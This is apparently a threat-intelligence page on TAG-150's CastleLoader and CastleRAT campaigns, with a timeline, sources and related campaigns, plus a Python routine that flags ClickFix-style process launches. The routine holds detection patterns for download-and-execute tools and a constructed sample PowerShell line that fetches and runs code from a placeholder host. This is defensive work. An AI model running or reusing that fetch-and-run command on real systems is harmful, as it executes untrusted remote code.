TAG-150 CastleLoader and CastleRAT malware operations
Malware Activity
Summary
TAG-150 malware activity now centers on CastleLoader and new CastleRAT variants (also tracked as NightShadeC2) that researchers have mapped onto a broader malware-as-a-service (MaaS) infrastructure. The cluster has been active since at least March 2025, had logged more than 1,600 attack attempts and nearly 470 infections by midsummer, and has affected more than 400 victims, most of them described as critical and including many United States government agencies. Delivery has relied on booby-trapped GitHub repositories, the ClickFix tactic, and fake-software websites, while Steam Community profiles and programsbookss[.]com serve as dead-drop resolvers for the command-and-control (C2) address. Both the C and Python CastleRAT variants remain under active development and show different feature sets and stealth behavior.
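The ClickFix delivery path mentioned above has the victim paste a command into the Windows Run dialog, so the interpreter that results is a child of explorer.exe carrying a download-and-execute one-liner on its command line. The following is an added example, not code from the cited reporting or from the researchers tracking TAG-150: a small Python triage routine that scores process-creation records for that pattern. The parent and child process lists, the command-line cues, and the sample events are generic ClickFix assumptions and constructed data, not indicators taken from this page.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str


# The Win+R Run dialog is hosted by explorer.exe, so a pasted ClickFix command
# shows up as an interpreter spawned directly by explorer.exe.
# Assumption: generic ClickFix heuristics, not an IOC set from TAG-150 reporting.
RUN_DIALOG_PARENTS = {"explorer.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Download-and-execute cues typical of pasted one-liners (assumption: generic).
STAGER_CUES = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|invoke-expression|iex)\b"
    r"|downloadstring|frombase64string"
    r"|\s-(enc|encodedcommand|e)\s"
    r"|\bmshta(\.exe)?\s+https?://"
    r"|\b(curl|bitsadmin|certutil)\b.*https?://",
    re.IGNORECASE,
)
# Fake-verification text that lures commonly append as a trailing comment so the
# pasted line looks like a CAPTCHA token (assumption: generic lure wording).
LURE_CUES = re.compile(r"i am not a robot|verify you are human|cloudflare|ray id", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path, quotes stripped."""
    return path.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> int:
    """Return a 0..3 suspicion score: +1 Run-dialog parent/child pair,
    +1 download-and-execute cue, +1 fake-verification lure text."""
    score = 0
    if basename(ev.parent_image) in RUN_DIALOG_PARENTS and basename(ev.image) in LOLBIN_CHILDREN:
        score += 1
        if STAGER_CUES.search(ev.command_line):
            score += 1
        if LURE_CUES.search(ev.command_line):
            score += 1
    return score


def find_clickfix_candidates(events: Iterable[ProcessEvent], threshold: int = 2) -> List[ProcessEvent]:
    """Events whose score reaches the threshold; 2 requires the parent/child
    pair plus at least one command-line cue, so a plain interactive shell
    opened from the Run dialog is not flagged."""
    return [ev for ev in events if score_event(ev) >= threshold]


# Constructed sample records (not real telemetry); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    # user simply opened PowerShell from Win+R
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'),
    # ClickFix-style paste with fake Cloudflare verification comment
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iwr https://example.invalid/c | iex" # I am not a robot - Cloudflare'),
    # mshta variant with no lure text
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://example.invalid/verify"),
    # encoded PowerShell launched from a batch script: outside this heuristic's scope
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -enc SQBFAFgA"),
]


if __name__ == "__main__":
    for ev in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"score={score_event(ev)} {basename(ev.image)}: {ev.command_line}")
```

The explorer.exe parent check deliberately scopes the rule to Run-dialog launches, which is why the fourth constructed record scores 0 even though its command line is encoded; a real hunt should pair this with a review of the HKCU\...\Explorer\RunMRU values, where the pasted command is also recorded, and with the page's own network indicators (Steam Community profile fetches and programsbookss[.]com) rather than relying on the command line alone.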
Related Happenings
Vidar infostealer market rise and distribution expansion
Malware Activity
First: 28.04.2026 22:07
Last: 28.04.2026 22:07
Sources 1
About this happening:
**Vidar** remains a long-running **infostealer** threat, and **Aryaka** reported a fresh campaign in **recent weeks** that adds **new obfuscation techniques** and stronger **steal...
Tropic Trooper trojanized SumatraPDF remote-access campaign
Campaign
First: 24.04.2026 12:29
Last: 24.04.2026 12:29
Sources 1
About this happening:
**Tropic Trooper** is running an active **campaign** that uses a **trojanized SumatraPDF** lure to plant **AdaptixC2 Beacon** and later abuse **VS Code tunnels** for remote access...
Torg Grabber browser-extension theft activity
Malware Activity
First: 25.03.2026 20:32
Last: 25.03.2026 20:32
Sources 1
About this happening:
The **Torg Grabber** infostealer is actively stealing data from **850 browser extensions**, including **728 cryptocurrency wallet extensions**, which raises the risk of account ta...
SloppyLemming spear-phishing campaign targeting Pakistan and Bangladesh
Campaign
First: 03.03.2026 08:53
Last: 03.03.2026 08:53
Sources 1
About this happening:
The **SloppyLemming** campaign is using **spear-phishing**, **PDF lures**, and **macro-enabled Excel documents** to target **government entities and critical infrastructure operat...
Graphalgo malicious npm and PyPI RAT downloader packages
Malware Activity
First: 14.02.2026 00:35
Last: 14.02.2026 00:35
Sources 1
About this happening:
**Graphalgo** is a continuing **malware-delivery operation** that uses **fake companies**, **fake job interviews**, and **coding tests** to lure **JavaScript and Python developers...
Latest development: 29.04.2026 17:43
North Korean Graphalgo operators use fake companies, fake job interviews, and coding tests on job-seeking platforms and social networks to lure developers into downloading GitHub-hosted assessment projects that carry malicious npm or PyPI dependencies and ultimately install a RAT. One front company, Blocmerce, registered an LLC in Florida in August 2025, and related GitHub organizations have been active since June 2025.
Timeline
05.09.2025 17:07 · 3 articles
TAG-150 expands CastleLoader into CastleRAT
Initial Disclosure: TAG-150 expands CastleLoader into CastleRAT, a remote access trojan available in Python and C variants that has been active since at least March 2025. The malware collects system information, downloads and executes additional payloads, and runs commands via CMD and PowerShell; the C variant adds keylogging, screenshot capture, file transfer, clipboard-based cryptocurrency clipping, and self-deletion. Infections are commonly initiated through Cloudflare-themed ClickFix phishing attacks or fraudulent GitHub repositories, and the infrastructure uses Steam Community profiles and programsbookss[.]com for dead-drop C2 resolution.
Sources
- TAG-150 Develops CastleRAT in Python and C, Expanding CastleLoader Malware Operations — thehackernews.com — 05.09.2025 17:07
- Secretive MaaS Group 'TAG-150' Develops Novel 'CastleRAT' — www.darkreading.com — 05.09.2025 21:28